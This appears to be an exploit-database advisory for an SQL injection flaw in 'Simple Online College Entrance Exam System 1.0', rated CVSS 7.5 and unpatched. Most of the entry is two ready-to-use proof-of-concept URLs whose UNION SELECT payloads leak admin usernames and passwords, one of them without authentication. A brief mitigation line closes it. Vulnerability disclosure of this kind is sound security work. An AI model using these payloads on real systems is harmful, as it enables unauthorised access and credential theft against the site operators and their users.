vendor:
Simple Online College Entrance Exam System
by:
Amine ismail @aminei_
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Simple Online College Entrance Exam System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: Windows 10, Kali Linux
2021
Simple Online College Entrance Exam System 1.0 – ‘Multiple’ SQL injection
The following PoCs will leak the admin username and password: Unauthenticated: http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list; Admin: http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;
Mitigation:
Input validation and sanitization should be implemented to prevent SQL injection attacks.